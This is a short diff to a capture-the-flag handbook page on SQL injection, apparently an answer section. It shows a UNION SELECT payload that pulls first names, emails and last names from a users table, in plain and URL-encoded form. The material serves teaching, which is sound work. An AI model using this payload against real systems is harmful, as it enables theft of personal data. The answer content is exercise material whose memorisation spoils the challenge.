Graylog2/ctf-handbook/docs/ctf/sql-injection_2.md

 ```sql
 catid=1000 UNION SELECT firstname, email, lastname FROM users LIMIT 7, 100
 ```
-In URL encoding, it would look like this:
+In URL encoding, because you live life on hardcore mode and you're injecting by URL - which means you probably aren't reading this tutorial but the above statement would look like this:
 ##### THERE DO BE ANSWERS HERE
 ```
 catid=1000%20UNION%20SELECT%20firstname%2C%20email%2C%20lastname%20FROM%20users%20LIMIT%207%2C%20100